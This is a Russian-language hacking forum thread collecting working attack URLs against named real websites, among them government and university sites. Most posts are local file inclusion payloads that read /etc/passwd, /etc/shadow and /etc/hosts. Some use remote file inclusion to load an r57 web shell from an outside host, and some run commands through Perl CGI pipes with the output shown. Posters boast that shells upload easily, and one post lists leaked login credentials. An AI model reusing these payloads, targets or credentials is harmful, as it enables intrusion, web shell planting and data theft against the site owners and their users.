PHP Иньекции

Начал изучать пхп иньекты,вот что из этого вышол:

Code:

http://www.megaspace.com.br/espaco/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00

--------------------------------------

Code:

http://www.cesarhoteis.com.br/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00

---------------------------------------

Code:

http://www.redemultiloja.com.br/publico/php/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00

---------------------------------------

Code:

http://mundomagico.no.comunidades.net/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00

----------------------------------

Code:

http://www.cabildoccr.gov.py/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00

------------------------------------

Code:

http://salveoplanetaterra.no.comunidades.net/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00

------------------------------------

Code:

http://www.gib-mbh.com/default/index2.php?pagina=../../../../etc/passwd%00

-----------------------------------

Code:

http://heshko.com/en/img.php?gal=../../../../../../../../etc/passwd%00

--------------------------------------

Code:

http://www.jibberjobber.com/static.php?page=../../../etc/passwd%00

------------------------------------------

Code:

http://home.no.net/vikebygd/index.php?vis=../../../../../../../etc/passwd%00

---------------------------------------------

Code:

http://www.pontewinery.com/php/index.php5?section=../../../../../../etc/passwd%00

--------------------------------------------

Code:

http://www.ays-clan.de/include.php?path=../../../../../../../../etc/passwd%00

-----------------------------------------------

Code:

http://www.thehype.de/kambodscha/forum/forum/YaBB.pl?board=../../../../../../../../etc/passwd%00

-------------------------------------------

Code:

http://www.eifn.ipacv.ro/index.php?action=../../../../../etc/passwd%00

-----------------------------------------------

Code:

http://www.becrux.com/index.php?page=../../../../../../../../../../../../../etc/passwd%00

---------------------------------------
The End!

 

Code:

http://www.wiscnews.com/archives/read.php?info=../../etc/passwd

---------------------------------

Code:

http://www.omega.ntnu.no/infosider/omomega.php?vis=../../../../../../etc/passwd%00

-------------------------------

Code:

http://www.ies.krakow.pl/konferencje/xxiii/index.php?link=../../../../../etc/passwd

------------------------------

Code:

http://forum.autonet.ca/cgi-bin/lookup.pl?user=../../../../../../etc/passwd%00

-------------------------------

Code:

http://www.tvmovie.de/dummy.123.0.html?&detail=../../../../../../../../../../../etc/passwd%00

--------------------------------

Code:

http://www.teddy.cx/index.php?site_id=../../../../etc/passwd%00

-------------------------------

Code:

http://www.thomasgray.org/cgi-bin/display.cgi?text=../../../../../etc/passwd%00

-------------------------------

Code:

http://www.yap.org.az/cgi-bin/datacgi/database.cgi?file=../../../../../../../../etc/passwd%00

-------------------------------

Code:

http://video.opalenica.com/index.php?sl=../../../../../../../etc/passwd%00

-------------------------------
The End!

 

Был такой или нет без понятия сори если что.....

http://vek-pk.ru/spravka.php?s=../../../../../../../../../../etc/passwd%00
http://vek-pk.ru/spravka.php?s=../../../../../../../../../../etc/hosts%00
http://vek-pk.ru/spravka.php?s=../../../../../../../../../../etc/ftpusers%00
http://vek-pk.ru/spravka.php?s=../../../../../../../../../../etc/services%00
http://vek-pk.ru/spravka.php?s=../../../../../../../../../../etc/group%00

 

Code:

http://www.plaxis.nl/?cat=../../../../../../../../../etc/passwd%00

Code:

http://www.tda.as/en/index.php?id=/etc/passwd%00

Code:

http://www.bcs.hu/letoltes.php?d_id=../../../../../../etc/passwd

Code:

http://forum.anime-club.ro/main.php?m=../../../../../etc/passwd%00

Code:

http://www.gkflora.no/index.php?side=/etc/passwd%00

Code:

http://www.hermes.bz/autohouse/system/index.cgi?p_act=../../../../../../../../etc/passwd%00

 

Вот от меня забираем и говорим спасибо =)

http://www.izetit.de/index_projekte.php?page=[INCLUDE] - UNIX
http://www.rockfreak.de/index.php?page=[INCLUDE] - UNIX
http://skc-murman.ru/index.php?page=[INCLUDE]&catid=2 - UNIX, SAFE_MODE

 

http://singletreffen.de/index.php3?session=&id=../../../etc/passwd%00

 

www.profucom.com.mx

www.profucom.com.mx
Profucom de México S.A de C.V. - Tecnología a Tu alcance

Code:

http://www.profucom.com.mx/profucom/atencion/help.php?css_path=../../../../../../etc/passwd%00

 

http://www.rockfreak.de/index.php?page=http://pizdil.freehostia.com/r57shell.txt
http://www.izetit.de/index_projekte.php?page=http://pizdil.freehostia.com/shell - тут загвоска тут подставляет автоматом .htm

 

www.grammi.edu.gr/gr/index.php?page=about.htm
www.grammi.edu.gr/gr/about.htm
www.grammi.edu.gr/gr/index.php?page=../images/aganargyroi_pic1.jpg

 

Code:

http://www.aquazoo.it/catalog/modules.php?op=modload&name=phpbb2&file=../../../../../../../../etc/passwd

только passwd - permission denied
можно что-нибудь по-вкуснее инклюдить

 

http://www.volgogradtour.ru/script.php?s=../../../../../../../../../../../../../etc/passwd%00&c=24&m=60
http://sex-flirt.com/index.php3?id=../../../../../../../../../../../../../../../etc/passwd%00
http://singletreffen.de/index.php3?session=&id=../../../../../../../../../../../../../../../../../../../etc/passwd%00

 

drocha.ru

Локальный инклуд

http://drocha.ru/?face=.htaccess


Так же можно смотреть стату сиджа

http://drocha.ru/webmasters.php


Реквизиты для входа:

pornoshkolacom::123
telkiname::121212
sweetyteenru::1234

 

www.singlespeed.org.uk

Code:

http://www.singlespeed.org.uk/article.php?file=../../../../../etc/passwd

www.videnet.gatech.edu

Code:

http://www.videnet.gatech.edu/cookbook.en/list_page.php?topic=6&url=../../../../../../etc/passwd&level=1&sequence=1&name=Best+Practices+for+the+Vid

 

Code:

http://firstshot.org/index.php?content_file=../../../../../../etc/passwd

Code:

http://www.mrsmalls.com/NewPHP/home.php?section=../../../../../../etc/passwd%00

Code:

http://aeroregister.net//home.php?page=../../../../../../../../../../../../../etc/passwd%00

Code:

http://www.hackshit.com/?page=../../../../../etc/passwd%00

 

http://www.cs.rmit.edu.au/fedconf/index.html?page=../../../../../../../../../../../../../../../etc/passwd%00 - PHP - include
http://www.cs.rmit.edu.au/fedconf/index.html?page=../../../../../../../../../../../../../../../etc/shadow%00 - узнаем пути
/www/www.cs.rmit.edu.au/special/fedconf/index.html =))
http://www.pep.spb.org/index.php?p=../../../../../../../../../../../../../etc/passwd

 

Давненько активности небыло
http://www.triton.eu/default_en.php?url=../../../../../../../../etc/hosts

 

win

 

Атака по перлам
Бажный perl скрипт на японском ресурсе.

Code:

http://tsukuba3.net/cgi-bin/albm.cgi?file=|id|

uid=1170(chicappa.jp-tsukuba3) gid=1000(ChicappaUser) groups=1000(ChicappaUser)

Code:

http://tsukuba3.net/cgi-bin/albm.cgi?file=|pwd|

/home/sites/chicappa.jp/users/chicappa.jp-tsukuba3/web/cgi-bin

Code:

http://tsukuba3.net/cgi-bin/albm.cgi?file=|which%20lynx|

/usr/bin/lynx
lyns присутствует(wget'a нету). Шелл заливается без проблем. Выкладывать не буду.
Кому надо сам зальет.


ещё нашел.

Code:

http://data.ccarnet.org/cgi-bin/respdisp.pl?file=../../../../../../../../../../../etc/passwd

 

Code:

http://www.adm.yrg.kuzbass.net/cgi-adm/lview.pl?file=|id|

uid=80(www) gid=80(www) groups=80(www)

Code:

http://www.adm.yrg.kuzbass.net/cgi-adm/lview.pl?file=|pwd|

/var/www/cgi-adm

Code:

http://www.adm.yrg.kuzbass.net/cgi-adm/lview.pl?file=|which%20fetch|

/usr/bin/fetch
походу только fetch есть. И через него отлично все заливается. Опять же не буду выкладывать шелл. Кто хочет, без всяких проблем сам зальет

Атака по перлам закончена

 

http://www.klassika.ru/read.html?proza/../

ыы